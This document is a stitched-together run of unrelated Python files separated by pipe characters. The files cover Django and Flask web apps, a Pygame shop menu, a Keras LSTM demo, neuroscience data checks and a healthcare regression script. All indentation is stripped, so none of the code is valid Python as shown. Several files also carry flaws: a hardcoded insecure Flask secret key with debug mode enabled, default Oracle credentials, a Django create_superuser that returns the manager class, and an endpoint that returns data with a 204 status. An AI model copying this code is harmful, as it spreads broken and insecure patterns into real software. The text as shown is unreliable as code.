print("Interest to be paid:%5.2f"%abs(interest2Pay));
print("Principal+Interest, to be paid:%5.2f"%abs(principal2Pay+interest2Pay));
|
from MainWindows.MainWindow import MainWindow
from SubWindows.SubWindow import SubWindow
import tkinter as tk
class Application():
def __init__(self,master=None):
self.main_window = MainWindow(master)
self.sub_window = SubWindow()
self.change_command()
def change_command(self):
self.main_window.select_file_frame.file_select_button["command"] \
= self.push_file_select_button
def push_file_select_button(self):
self.main_window.push_select_button()
if self.main_window.path == "":
return
path = self.main_window.path
self.sub_window.set_path(path)
if __name__ == "__main__":
root = tk.Tk()
window = Application(root)
root.mainloop() |
from drf_yasg.utils import swagger_auto_schema
from rest_framework import status
from rest_framework.decorators import action
from rest_framework.viewsets import ModelViewSet
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from authentication.serializers import CurrentUserSerializer
from like_app.schema import EmptySchema
from posts import utils
from posts.serializers import PostSerializers
from posts.models import Post
class PostViewSet(ModelViewSet):
"""
list:
Get list of posts
Get list of user posts
retrieve:
Retrieve post
Retrieve specific post with ID
create:
Create new Post
Create new Post.
update:
Update Post with
Update Post with the given ID.
partial_update:
Partial update of Post
Partial update of Post
destroy:
Delete Post
Delete Post with given ID
like:
Like a post instance
Like a post instance, like return `1`
dislike:
Dislike a post instance
Dislike a post instance, and remove like if it exist
users:
Return all users by post id
Return all users which likes post by id
"""
serializer_class = PostSerializers
queryset = Post.objects.all()
permission_classes = [IsAuthenticated]
@swagger_auto_schema(responses={'204': EmptySchema})
@action(detail=True, methods=['POST'], permission_classes=(IsAuthenticated,))
def like(self, request, pk=None):
obj = self.get_object()
utils.add_like(obj, request.user)
return Response(status=status.HTTP_204_NO_CONTENT)
@swagger_auto_schema(responses={'204': EmptySchema})
@action(detail=True, methods=['POST'], permission_classes=(IsAuthenticated,))
def dislike(self, request, pk=None):
obj = self.get_object()
utils.remove_like(obj, request.user)
return Response(status=status.HTTP_204_NO_CONTENT)
@swagger_auto_schema(responses={'204': EmptySchema})
@action(detail=True, methods=['GET'], permission_classes=(IsAuthenticated,))
def users(self, request, pk=None):
obj = self.get_object()
fans = utils.get_fans(obj)
serializer = CurrentUserSerializer(fans, many=True)
return Response(serializer.data, status=status.HTTP_204_NO_CONTENT)
|
#while roof 돌려서 lew line으로 만든다
#len(board)가 일자
#count 가 place에 도달했을떄 new에다가slash추가
#r.strip = 오른쪽에있는가 사라진다
class Molecule:
def __init__(self, row, column):
grid = []
board = ''
for x in range(row):
grid.append(('. ' * column)[:-1])
for list1 in grid:
board += list1
self.row = row
self.column = column
self.board = board
self.grid = grid
def atom(self, pos, forward = True):
x,y = pos
if forward:
slash = '\\'
else:
slash = '/'
board = self.board
board = board.replace(' ','')
place = x*self.column + y
assert place <= (self.column*self.row), 'invalid position'
counter = 0
new = ''
while counter != len(board):
if place != counter:
new += board[counter]
else:
new += slash
counter += 1
grid = ''
line = ''
for char in new:
line += char + ' '
if len(line) == (self.column*2)-1:
grid += line[:-1] + '\n'
line = ''
self.grid = grid.rstrip('\n')
def atoms(self, list1):
for pos in list1:
self.atom(pos)
def __str__(self):
return self.grid |
from enum import Enum
class VariableType(Enum):
variable = 0
temporary = 1
user_function = 2
builtin_function = 3
class ScopeType(Enum):
top = 0
function = 1
sub = 2
|
from itertools import cycle
from sys import argv
if argv[1][-4:] == '.txt':
route = open(argv[1], 'r').read().strip().split(',')
else:
route = argv[1].split(',')
options = 'nw', 'n', 'ne', 'se', 's', 'sw'
def optimize(route):
for option in options:
counter_option = (options + options)[options.index(option) + 3]
rewrite_option = (options + options)[options.index(option) + 2]
rewrite_to = (options + options)[options.index(option) + 1]
while option in route and counter_option in route:
route.remove(option)
route.remove(counter_option)
while option in route and rewrite_option in route:
route.remove(option)
route.remove(rewrite_option)
route.append(rewrite_to)
# Part 1
route1 = route[:]
optimize(route1)
answer1 = len(route1)
print('Destination is reachable in {} steps'.format(answer1))
# Part 2
farthest_away = 0
route2 = []
for i in range(len(route)):
route2.append(route[i])
optimize(route2)
farthest_away = max(farthest_away, len(route2))
answer2 = farthest_away
print('Farthest away from starting points is {} steps'.format(answer2))
|
#importing of the neccessary modules and method
#the os path module implements some useful functions on pathnames and directory access
#imports that are making big changes
from os.path import abspath, dirname, join
from flask import flash, Flask, Markup, redirect, render_template, url_for
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.wtf import Form
from wtforms import fields
from wtforms.ext.sqlalchemy.fields import QuerySelectField
#making a path to the database
_cwd = dirname(abspath(__file__))
SECRET_KEY = 'flask-session-insecure-secret-key'
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + join(_cwd, 'wms.db')
SQLALCHEMY_ECHO = True
WTF_CSRF_SECRET_KEY = 'this-should-be-more-random'
app = Flask(__name__)
app.config.from_object(__name__)
db = SQLAlchemy(app)
#making table for tracking_site
class Site(db.Model):
__tablename__ = 'received_goods'
incoming_itemID = db.Column(db.Integer,primary_key = True)
product_id = db.Column(db.String(80))
product_name = db.Column(db.String(120))
supplyer_name = db.Column(db.String(300))
amount = db.Column(db.Integer(9))
#this tells python how to print objects of this class
def __repr__(self):
return '<Site %s>' % (self.base_url)
def __str__(self):
return self.base_url
class SiteForm(Form):
product_id = fields.StringField()
product_name = fields.StringField()
supplyer_name = fields.StringField()
amount = fields.StringField()
#perform the url mapping
@app.route("/")
def index():
site_form = SiteForm()
return render_template("index.html",site_form = site_form)
#the form is loaded as the index page
@app.route("/site",methods =("POST",))
def add_site():
form = SiteForm()
if form.validate_on_submit():
site = Site()
form.populate_obj(site)
db.session.add(site)
db.session.commit()
return redirect(url_for("index"))
return render_template("validation_error.html",form = form)
#get the data inserted on this page url mappeteing
@app.route("/sites")
def view_sites():
data = Site.query.filter(Site.product_id >= 0)
#data = [next(data)] + [[_make_link(cell) if i == 0 else cell for i, cell in enumerate(row)] for row in data]
return render_template("display_data.html", data=data ,type="Sites")
#display the data down here without on reload
if __name__ == "__main__":
app.debug = True
db.create_all()
app.run()
|
import numpy as np
import os
import cv2
from tqdm import tqdm
import tables
def check_widefield_frame_times(base_directory):
# Load Widfield Frame Times
widefield_frame_times = np.load(os.path.join(base_directory, "Stimuli_Onsets", "Frame_Times.npy"), allow_pickle=True)[()]
widefield_frame_times = list(widefield_frame_times.values())
number_of_widefield_triggers = len(widefield_frame_times)
# Load Widefield Frame Data
widefield_filename = os.path.join(base_directory, "Downsampled_Delta_F.h5")
widefield_file_container = tables.open_file(widefield_filename, mode="r")
widefield_data = widefield_file_container.root["Data"]
widefield_frames = np.shape(widefield_data)[0]
widefield_file_container.close()
# Check Match
if number_of_widefield_triggers == widefield_frames:
match_message = "Frame Numbrrs Match :) "
filename = "Frame_Check_Passed.txt"
print("Passed :)")
else:
match_message = "Frame Numbers Dont Match :( "
filename = "Frame_Check_Failed.txt"
print("Failed :( " + base_directory + "Frame Difference " + str(number_of_widefield_triggers - widefield_frames))
# Save As Text File
text_filename = os.path.join(base_directory, filename)
with open(text_filename, 'w') as f:
f.write('Widefield Frame Triggers: ' + str(number_of_widefield_triggers) + "\n")
f.write('Widefield Frames: ' + str(widefield_frames) + "\n")
f.write(match_message + "\n")
session_list = [
r"NRXN78.1A/2020_11_28_Switching_Imaging",
r"NRXN78.1A/2020_12_05_Switching_Imaging",
r"NRXN78.1A/2020_12_09_Switching_Imaging",
r"NRXN78.1D/2020_12_07_Switching_Imaging",
r"NRXN78.1D/2020_11_29_Switching_Imaging",
r"NRXN78.1D/2020_12_05_Switching_Imaging",
r"NXAK14.1A/2021_05_21_Switching_Imaging",
r"NXAK14.1A/2021_05_23_Switching_Imaging",
r"NXAK14.1A/2021_06_11_Switching_Imaging",
r"NXAK14.1A/2021_06_13_Transition_Imaging",
r"NXAK14.1A/2021_06_15_Transition_Imaging",
r"NXAK14.1A/2021_06_17_Transition_Imaging",
r"NXAK22.1A/2021_10_14_Switching_Imaging",
r"NXAK22.1A/2021_10_20_Switching_Imaging",
r"NXAK22.1A/2021_10_22_Switching_Imaging",
r"NXAK22.1A/2021_10_29_Transition_Imaging",
r"NXAK22.1A/2021_11_03_Transition_Imaging",
r"NXAK22.1A/2021_11_05_Transition_Imaging",
r"NXAK4.1B/2021_03_02_Switching_Imaging",
r"NXAK4.1B/2021_03_04_Switching_Imaging",
r"NXAK4.1B/2021_03_06_Switching_Imaging",
r"NXAK4.1B/2021_04_02_Transition_Imaging",
r"NXAK4.1B/2021_04_08_Transition_Imaging",
r"NXAK4.1B/2021_04_10_Transition_Imaging",
r"NXAK7.1B/2021_02_26_Switching_Imaging",
r"NXAK7.1B/2021_02_28_Switching_Imaging",
r"NXAK7.1B/2021_03_02_Switching_Imaging",
r"NXAK7.1B/2021_03_23_Transition_Imaging",
r"NXAK7.1B/2021_03_31_Transition_Imaging",
r"NXAK7.1B/2021_04_02_Transition_Imaging",
r"NRXN78.1A/2020_11_14_Discrimination_Imaging",
r"NRXN78.1A/2020_11_15_Discrimination_Imaging",
r"NRXN78.1A/2020_11_24_Discrimination_Imaging",
r"NRXN78.1A/2020_11_21_Discrimination_Imaging",
r"NRXN78.1D/2020_11_14_Discrimination_Imaging",
r"NRXN78.1D/2020_11_15_Discrimination_Imaging",
r"NRXN78.1D/2020_11_25_Discrimination_Imaging",
r"NRXN78.1D/2020_11_23_Discrimination_Imaging",
r"NXAK4.1B/2021_02_04_Discrimination_Imaging",
r"NXAK4.1B/2021_02_06_Discrimination_Imaging",
r"NXAK4.1B/2021_02_22_Discrimination_Imaging",
r"NXAK4.1B/2021_02_14_Discrimination_Imaging",
r"NXAK7.1B/2021_02_01_Discrimination_Imaging",
r"NXAK7.1B/2021_02_03_Discrimination_Imaging",
r"NXAK7.1B/2021_02_24_Discrimination_Imaging",
r"NXAK7.1B/2021_02_22_Discrimination_Imaging",
r"NXAK14.1A/2021_04_29_Discrimination_Imaging",
r"NXAK14.1A/2021_05_01_Discrimination_Imaging",
r"NXAK14.1A/2021_05_09_Discrimination_Imaging",
r"NXAK14.1A/2021_05_07_Discrimination_Imaging",
r"NXAK22.1A/2021_09_25_Discrimination_Imaging",
r"NXAK22.1A/2021_09_29_Discrimination_Imaging",
r"NXAK22.1A/2021_10_08_Discrimination_Imaging",
r"NXAK22.1A/2021_10_07_Discrimination_Imaging",
]
full_session_list = []
for item in session_list:
full_session_list.append(os.path.join("/media/matthew/Expansion/Control_Data", item))
print(full_session_list)
for base_directory in full_session_list:
check_widefield_frame_times(base_directory) |
# %load q01_get_total_deliveries_players/build.py
# Default imports
import numpy as np
batsman_input= b'SR Tendulkar'
ipl_matches_array =np.genfromtxt('data/ipl_matches_small.csv', dtype='|S50', skip_header=0, delimiter=',')
def get_total_deliveries_played(batsman_input):
batsman=ipl_matches_array[:,13]
unique_elements, counts_elements = np.unique(batsman==batsman_input, return_counts=True)
return counts_elements[1]
get_total_deliveries_played(batsman_input)
|
from django.utils import timezone
from django.db import models
from django.contrib.auth.models import BaseUserManager
from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin
# CUSTOM USER AUTH
###############################################################################
class UserManager(BaseUserManager):
def create_user(self, email, password, **kwargs):
user = self.model(
email=self.normalize_email(email),
is_active=True,
**kwargs
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password, **kwargs):
user = self.model(
email=email,
is_superuser=True,
is_staff=True,
is_active=True,
is_admin=True,
**kwargs
)
user.set_password(password)
user.save(using=self._db)
return UserManager
class User(AbstractBaseUser, PermissionsMixin):
USERNAME_FIELD = 'email'
email = models.EmailField(unique=True)
first_name = models.CharField(max_length=30, null=True, blank=True)
last_name = models.CharField(max_length=30, null=True, blank=True)
contact_number = models.CharField(max_length=30, null=True, blank=True)
is_staff = models.BooleanField(default=False)
is_active = models.BooleanField(default=False)
is_admin = models.BooleanField(default=False)
def get_full_name(self):
return self.email
def get_short_name(self):
return self.email
objects = UserManager()
###############################################################################
###############################################################################
###############################################################################
class Category(models.Model):
name = models.CharField(max_length=20)
is_active = models.BooleanField(default=True)
class Game_info(models.Model):
title = models.CharField(max_length=30, unique=True)
description = models.TextField(max_length=3000)
platform = models.CharField(max_length=15)
category_id = models.ForeignKey(Category)
img = models.ImageField(null=True, blank=True)
thumbnail = models.ImageField(null=True, blank=True)
dlink = models.CharField(max_length=100, null=True, blank=True)
vlink = models.CharField(max_length=100, null=True, blank=True)
is_active = models.BooleanField(default=True)
def __str__(self):
return self.title
class Feedback(models.Model):
comment = models.TextField(max_length=300)
created_date = models.DateTimeField(default=timezone.now(),blank=True, null=True)
published_date = models.DateTimeField(blank=True, null=True)
rating = models.IntegerField()
user = models.ForeignKey(User)
is_active = models.BooleanField(default=True)
class Game_request(models.Model):
title = models.CharField(max_length=30)
created_date = models.DateTimeField(default=timezone.now(),blank=True, null=True)
published_date = models.DateTimeField(blank=True, null=True)
user = models.ForeignKey(User)
is_active = models.BooleanField(default=True)
|
#!/usr/bin/env python3
"""Module implementing a CLI for the Cook scheduler API. """
import logging
import signal
import sys
from cook import util
from cook.cli import run
from cook.util import print_error
def main(args=None, plugins={}):
if args is None:
args = sys.argv[1:]
try:
result = run(args, plugins)
sys.exit(result)
except Exception as e:
logging.exception('exception when running with %s' % args)
print_error(str(e))
sys.exit(1)
def sigint_handler(_, __):
"""
Sets util.quit_running to True (which is read by other
threads to determine when to stop), and then exits.
"""
util.quit_running = True
print('Exiting...')
sys.exit(0)
signal.signal(signal.SIGINT, sigint_handler)
if __name__ == '__main__':
main()
|
# C3 == 2 "String"
# C17 == 15 "В заданому тексті замінити слова заданої довжини визначеним рядком."
# Створити клас, який складається з виконавчого методу, що виконує дію текстовим рядком (п.3), тип якого визначено варіантом (п.2).
# Необхідно обробити всі виключні ситуації, що можуть виникнути під час виконання програмного коду.
# Всі змінні повинні бути описані та значення їх задані у виконавчому методі.
import re
class Main():
def __init__(self):
text = "Створити клас, який складається з виконавчого методу, що виконує дію текстовим рядком, тип якого визначено варіантом.\
Необхідно обробити всі виключні ситуації, що можуть виникнути під час виконання програмного коду.\
Всі змінні повинні бути описані та значення їх задані у виконавчому методі."
if type(text) is not str:
print("Заміняти слова треба в тексті, написано ж")
return
replace = str(input("Введіть, чим ви хочете замінити слова: "))
try:
word_length = int(input("Введіть довжину слів, які треба замінити: "))
except ValueError:
print("Довжина шуканих слів повинна бути цілим числом, це ж очевидно, блін")
return
text = re.sub("\\b[а-яА-Яa-zA-Z]{"+str(word_length)+"}\\b", replace, text)
print(text)
main = Main()
|
#
# Python script that takes a folder and a file
# and creates the galaxy html
#
# @author James Boocock.
import os
galhtmlprefix = """<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="generator" content="Galaxy %s tool output - see http://g2.trac.bx.psu.edu/" />
<title></title>
<link rel="stylesheet" href="/static/style/base.css" type="text/css" />
</head>
<body>
<div class="document">
"""
galhtmlpostfix = """</div>\n</body>\n</html>\n"""
def create_html(file_dir, html_file, base_name):
f = file(html_file, 'w')
f.write(galhtmlprefix)
flist = os.listdir(file_dir)
for i, data in enumerate(flist):
f.write('<li><a href="%s">%s</a></li>\n' % (os.path.split(data)[-1],os.path.split(data)[-1]))
f.write(galhtmlpostfix)
f.close()
|
"""
Este modulo contiene todo lo necesario para
dar soporte al menu de inicio, de pausa y
de compra
"""
import pygame
class Shop():
"""
Esta clase da soporte a la tienda del juego
"""
def __init__(self, screen, settings):
self.screen = screen
self.settings = settings
# Establecemos el tiempo entre rondas
self.time_between_rounds = 30
self.shop_background = None
self.shop_background_rect = None
# Almacenaremos las imagenes y los rects que las contendran simultaneamente
self.shop_items = []
self.shop_items_rects = []
# Guardamos el progreso de la tienda
self.shop_progress = [0, 0, 0, 0, 0, 0]
# En funcion del numero de vidas que hayamos comprado en una ronda aumentara
#cada vez mas el precio de estas. En una nueva ronda se reinicia
self.lifes_progress = 0
self.shop_open = False
# Cargamos el icono para abrir la tienda
self.shop_icon = pygame.image.load(".\\resources\\shop_icon.bmp")
self.shop_icon_rect = self.shop_icon.get_rect()
self.shop_icon_rect.left = self.settings.screen_width - 80
self.shop_icon_rect.top = 10
# Cargamos los iconos de la tienda
# Primero el tablero de la tienda
self.shop_background = pygame.image.load(".\\resources\\shop_board.bmp")
self.shop_background_rect = self.shop_background.get_rect()
self.shop_background_rect.centerx = settings.screen_width / 2
self.shop_background_rect.centery = settings.screen_height / 2
# Ahora el boton de salir de la tienda
self.exit_icon = pygame.image.load(".\\resources\\exit_shop.png")
self.exit_icon_rect = self.exit_icon.get_rect()
self.exit_icon_rect.centerx = self.shop_background_rect.right - 40
self.exit_icon_rect.centery = self.shop_background_rect.top + 40
# Ahora cargaremos las imagenes de los diferentes items de la tienda
# junto con sus mejoras
for i in range(6):
self.shop_items.append([])
self.shop_items_rects.append([])
self.shop_items[0].append(pygame.image.load(".\\resources\\repair_lvl1.bmp"))
self.shop_items_rects[0].append(self.shop_items[0][0].get_rect())
self.shop_items_rects[0][0].centerx = self.shop_background_rect.left + 218
self.shop_items_rects[0][0].centery = self.shop_background_rect.top + 178
self.shop_items[0].append(pygame.image.load(".\\resources\\repair_lvl2.bmp"))
self.shop_items_rects[0].append(self.shop_items[0][1].get_rect())
self.shop_items_rects[0][1].centerx = self.shop_background_rect.left + 218
self.shop_items_rects[0][1].centery = self.shop_background_rect.top + 178
self.shop_items[0].append(pygame.image.load(".\\resources\\repair_lvl3.bmp"))
self.shop_items_rects[0].append(self.shop_items[0][2].get_rect())
self.shop_items_rects[0][2].centerx = self.shop_background_rect.left + 218
self.shop_items_rects[0][2].centery = self.shop_background_rect.top + 178
self.shop_items[1].append(pygame.image.load(".\\resources\\speed_lvl1.bmp"))
self.shop_items_rects[1].append(self.shop_items[1][0].get_rect())
self.shop_items_rects[1][0].centerx = self.shop_background_rect.left + 500
self.shop_items_rects[1][0].centery = self.shop_background_rect.top + 178
self.shop_items[1].append(pygame.image.load(".\\resources\\speed_lvl2.bmp"))
self.shop_items_rects[1].append(self.shop_items[1][1].get_rect())
self.shop_items_rects[1][1].centerx = self.shop_background_rect.left + 500
self.shop_items_rects[1][1].centery = self.shop_background_rect.top + 178
self.shop_items[1].append(pygame.image.load(".\\resources\\speed_lvl3.bmp"))
self.shop_items_rects[1].append(self.shop_items[1][2].get_rect())
self.shop_items_rects[1][2].centerx = self.shop_background_rect.left + 500
self.shop_items_rects[1][2].centery = self.shop_background_rect.top + 178
self.shop_items[1].append(pygame.image.load(".\\resources\\speed_no_upgrades.bmp"))
self.shop_items_rects[1].append(self.shop_items[1][3].get_rect())
self.shop_items_rects[1][3].centerx = self.shop_background_rect.left + 500
self.shop_items_rects[1][3].centery = self.shop_background_rect.top + 178
self.shop_items[2].append(pygame.image.load(".\\resources\\ship_health_lvl1.bmp"))
self.shop_items_rects[2].append(self.shop_items[2][0].get_rect())
self.shop_items_rects[2][0].centerx = self.shop_background_rect.left + 782
self.shop_items_rects[2][0].centery = self.shop_background_rect.top + 178
self.shop_items[2].append(pygame.image.load(".\\resources\\ship_health_lvl2.bmp"))
self.shop_items_rects[2].append(self.shop_items[2][1].get_rect())
self.shop_items_rects[2][1].centerx = self.shop_background_rect.left + 782
self.shop_items_rects[2][1].centery = self.shop_background_rect.top + 178
self.shop_items[2].append(pygame.image.load(".\\resources\\ship_health_lvl3.bmp"))
self.shop_items_rects[2].append(self.shop_items[2][2].get_rect())
self.shop_items_rects[2][2].centerx = self.shop_background_rect.left + 782
self.shop_items_rects[2][2].centery = self.shop_background_rect.top + 178
self.shop_items[2].append(pygame.image.load(".\\resources\\ship_health_no_upgrades.bmp"))
self.shop_items_rects[2].append(self.shop_items[2][3].get_rect())
self.shop_items_rects[2][3].centerx = self.shop_background_rect.left + 782
self.shop_items_rects[2][3].centery = self.shop_background_rect.top + 178
self.shop_items[3].append(pygame.image.load(".\\resources\\damage_lvl1.bmp"))
self.shop_items_rects[3].append(self.shop_items[3][0].get_rect())
self.shop_items_rects[3][0].centerx = self.shop_background_rect.left + 218
self.shop_items_rects[3][0].centery = self.shop_background_rect.top + 420
self.shop_items[3].append(pygame.image.load(".\\resources\\damage_lvl2.bmp"))
self.shop_items_rects[3].append(self.shop_items[3][1].get_rect())
self.shop_items_rects[3][1].centerx = self.shop_background_rect.left + 218
self.shop_items_rects[3][1].centery = self.shop_background_rect.top + 420
self.shop_items[3].append(pygame.image.load(".\\resources\\damage_lvl3.bmp"))
self.shop_items_rects[3].append(self.shop_items[3][2].get_rect())
self.shop_items_rects[3][2].centerx = self.shop_background_rect.left + 218
self.shop_items_rects[3][2].centery = self.shop_background_rect.top + 420
self.shop_items[3].append(pygame.image.load(".\\resources\\damage_no_upgrades.bmp"))
self.shop_items_rects[3].append(self.shop_items[3][3].get_rect())
self.shop_items_rects[3][3].centerx = self.shop_background_rect.left + 218
self.shop_items_rects[3][3].centery = self.shop_background_rect.top + 420
self.shop_items[4].append(pygame.image.load(".\\resources\\bpm_lvl1.bmp"))
self.shop_items_rects[4].append(self.shop_items[4][0].get_rect())
self.shop_items_rects[4][0].centerx = self.shop_background_rect.left + 500
self.shop_items_rects[4][0].centery = self.shop_background_rect.top + 420
self.shop_items[4].append(pygame.image.load(".\\resources\\bpm_no_upgrades.bmp"))
self.shop_items_rects[4].append(self.shop_items[4][1].get_rect())
self.shop_items_rects[4][1].centerx = self.shop_background_rect.left + 500
self.shop_items_rects[4][1].centery = self.shop_background_rect.top + 420
self.shop_items[5].append(pygame.image.load(".\\resources\\1up.bmp"))
self.shop_items_rects[5].append(self.shop_items[5][0].get_rect())
self.shop_items_rects[5][0].centerx = self.shop_background_rect.left + 782
self.shop_items_rects[5][0].centery = self.shop_background_rect.top + 420
def blitme(self):
"""
Muestra la tienda en pantalla
"""
if self.shop_open:
self.screen.blit(self.shop_background, self.shop_background_rect)
self.screen.blit(self.exit_icon, self.exit_icon_rect)
for i in range(len(self.shop_items)):
self.screen.blit(self.shop_items[i][self.shop_progress[i]],
self.shop_items_rects[i][self.shop_progress[i]])
def upgrade(self, upgrade, ship, player):
"""
Realizamos una accion u otra en funcion del input del usuario,
que viene en el campo 'upgrade'
"""
if upgrade == "repair":
ship.health = ship.max_health
elif upgrade == "speed" and self.shop_progress[1] < 3:
ship.speed_factor += 3
self.shop_progress[1] += 1
elif upgrade == "health" and self.shop_progress[2] < 3:
ship.max_health += 50
ship.health = ship.max_health
self.shop_progress[2] += 1
if self.shop_progress[2] < 3:
self.shop_progress[0] += 1
elif upgrade == "damage" and self.shop_progress[3] < 3:
ship.bullet_damage += 5
self.shop_progress[3] += 1
elif upgrade == "bpm" and self.shop_progress[1] < 1:
self.settings.bullets_allowed += 2
ship.bullet_speed_factor += 5
self.shop_progress[4] += 1
elif upgrade == "life":
player.lifes += 1
self.lifes_progress += 1
|
import cx_Oracle as c
from flask import Flask,render_template, request,make_response
app=Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/form',methods=['POST'])
def form():
return render_template('form.html')
@app.route('/store',methods=['POST'])
def store():
if request.method=='POST':
con=c.connect('c##scott/tiger@localhost/orcl')
print(con.version)
cur=con.cursor()
msg=''
try:
name=request.form.get('name')
contact=request.form.get('contact')
email=request.form.get('email')
cur.execute("insert into profileCard values(:x,:y,:z)",{"x":name,"y":contact,"z":email})
con.commit()
msg='Message Successfully delivered'
print(msg,con)
except Exception as e:
print(e)
con.rollback()
msg='error in insert'
return '<h1>Message Delivered</h1>'
if __name__=='__main__':
app.run()
|
# -*- coding: utf-8
from __future__ import unicode_literals
from httplib import responses
from flask import current_app as app
from flask import Blueprint, jsonify, request
from www.content import repository, exceptions
from www.main.serializers import serialize
from www.main.exceptions import ApiError
from www.decorators import add_headers, cache_headers
api = Blueprint('main-api', __name__, subdomain='api')
def abort(status_code):
raise ApiError(responses.get(status_code, ''), status_code=status_code)
@api.route('/')
@api.route('/<path:path>/')
@add_headers({'Access-Control-Allow-Origin': '*'})
@cache_headers(seconds=21600)
def index(path=''):
branch = request.args.get('branch', app.config.get('BRANCHES_DEFAULT'))
if branch not in app.config.get('BRANCHES_PUBLIC'):
abort(403)
try:
repo = repository(app.config.get('CONTENT_ROOT')).changeset(branch)
except exceptions.RepositoryError:
abort(404)
try:
directory = repo.get_directory(path)
except exceptions.NodeDoesNotExistError:
abort(404)
return jsonify(serialize(directory, config=app.config))
@api.route('/<name>')
@api.route('/<path:path>/<name>')
@add_headers({'Access-Control-Allow-Origin': '*'})
@cache_headers(seconds=21600)
def file(name, path=''):
branch = request.args.get('branch', app.config.get('BRANCHES_DEFAULT'))
if branch not in app.config.get('BRANCHES_PUBLIC'):
abort(403)
try:
repo = repository(app.config.get('CONTENT_ROOT')).changeset(branch)
except exceptions.RepositoryError:
abort(404)
try:
page = repo.find_file(
path, name, app.config.get('FILE_RENDERERS', {}).keys())
except exceptions.NodeDoesNotExistError:
abort(404)
return jsonify(serialize(page, config=app.config))
|
# Databricks notebook source
# MAGIC %md
# MAGIC ScaDaMaLe Course [site](https://lamastex.github.io/scalable-data-science/sds/3/x/) and [book](https://lamastex.github.io/ScaDaMaLe/index.html)
# MAGIC
# MAGIC This is a 2019-2021 augmentation and update of [Adam Breindel](https://www.linkedin.com/in/adbreind)'s initial notebooks.
# MAGIC
# MAGIC _Thanks to [Christian von Koch](https://www.linkedin.com/in/christianvonkoch/) and [William Anzén](https://www.linkedin.com/in/william-anz%C3%A9n-b52003199/) for their contributions towards making these materials Spark 3.0.1 and Python 3+ compliant._
# COMMAND ----------
import numpy
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.utils import np_utils
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
char_to_int = dict((c, i) for i, c in enumerate(alphabet))
int_to_char = dict((i, c) for i, c in enumerate(alphabet))
seq_length = 3
dataX = []
dataY = []
for i in range(0, len(alphabet) - seq_length, 1):
seq_in = alphabet[i:i + seq_length]
seq_out = alphabet[i + seq_length]
dataX.append([char_to_int[char] for char in seq_in])
dataY.append(char_to_int[seq_out])
print (seq_in, '->', seq_out)
# reshape X to be [samples, time steps, features]
X = numpy.reshape(dataX, (len(dataX), seq_length, 1))
X = X / float(len(alphabet))
y = np_utils.to_categorical(dataY)
model = Sequential()
model.add(LSTM(32, input_shape=(X.shape[1], X.shape[2])))
model.add(Dense(y.shape[1], activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(X, y, epochs=400, batch_size=1, verbose=2)
scores = model.evaluate(X, y)
print("Model Accuracy: %.2f%%" % (scores[1]*100))
for pattern in ['WBC', 'WKL', 'WTU', 'DWF', 'MWO', 'VWW', 'GHW', 'JKW', 'PQW']:
pattern = [char_to_int[c] for c in pattern]
x = numpy.reshape(pattern, (1, len(pattern), 1))
x = x / float(len(alphabet))
prediction = model.predict(x, verbose=0)
index = numpy.argmax(prediction)
result = int_to_char[index]
seq_in = [int_to_char[value] for value in pattern]
print (seq_in, "->", result)
# COMMAND ----------
|
# Python for Healthcare
## 500 Cities Linear Regression
### Import Standard Libraries
import os # Inlcuded in every script DC!
import pandas as pd # Incldued in every code script for DC!
import numpy as np # Incldued in every code script for DC!
### Set working directory to project folder
os.chdir("C:/Users/drewc/GitHub/python-for-healthcare/pylessons/pymodule4") # Set wd to project repository
### Verify
print("Ready") # Print result
#################### Break ####################
# Section A: 500 Cities Analysis
print("Section A: Start") # Print result
## Step 1: Import Libraries and Data
### Import Statistics Packages
import statsmodels.api as sm # Regression modeling in scipy
### Import Visualization Packages
import matplotlib.pyplot as plt # Comprehensive graphing package in python
### Import 500 Cities Data
df_five = pd.read_csv("_data/fivecities_stage.csv", encoding = "ISO-8859-1") # Import dataset saved as csv in _data folder
## Step 2: Prepare Data for Analysis
### Select only State and Measure
df_filter = df_five.filter(["Diabetes", "ChildAsthma"]) # Keep only selected columns
### Drop NA values
df_na = df_filter.dropna() # Drop all rows with NA values
### Rename Dataframe
df_dmca = df_na # Rename sorted dataframe as MSPB for clarity
### Verify MSPB
df_dmca.info() # Get class, memory, and column info: names, data types, obs.
df_dmca.head() # Print first 5 observations
## Step 3: Conduct Analysis and Tests
### Linear Regression Model
x = df_dmca["ChildAsthma"] # features as x
y = df_dmca["Diabetes"] # Save outcome variable as y
model = sm.OLS(y, x).fit() # Run Linear Regression Model This may but most likely wont take time
result = model.summary() # Create Summary of final model
### Create Results Text File
text_file = open("_fig/diabetes_asthma_model.txt", "w") # Open text file and name with subproject, content, and result suffix. To write or overwrite a new file, type "w". To append, type "a".
text_file.write(str(result)) # Line of text with string version of a data object
text_file.close() # Close file
### Verify Regression
print(result) # Print result to verify
## Step 4: Create Visuals and Outputs
### Create Figure
plt.figure() # Create blank figure before creating plot
### Create Scatter Plot
plt.scatter(df_dmca["ChildAsthma"], df_dmca["Diabetes"], c = "b") # Create scatter plot with (x axis, y axis, color)
### Set Labels and Titles
plt.ylabel("Estimated Prevalence of Type 2 Diabetes") # Label Y axis
plt.xlabel("Estimated Prevalence of ChildAsthma") # Label for X Axis
plt.title("CDC 500 Cities 2019 Data: Child Asthma and Diabetes") # Title above the plot
### Save to figure file
plt.savefig("_fig/diabetes_asthma_scatter.jpeg", bbox_inches = "tight") # Save figure file to _fig in directory, use tight to make a good looking image
### Verify
plt.show() # Show plot |
from django.contrib.auth.forms import AuthenticationForm, UsernameField
from django import forms
from django.contrib.auth import (
authenticate, get_user_model, password_validation,
)
from django.contrib.auth.hashers import (
UNUSABLE_PASSWORD_PREFIX, identify_hasher,
)
from django.contrib.auth.models import User
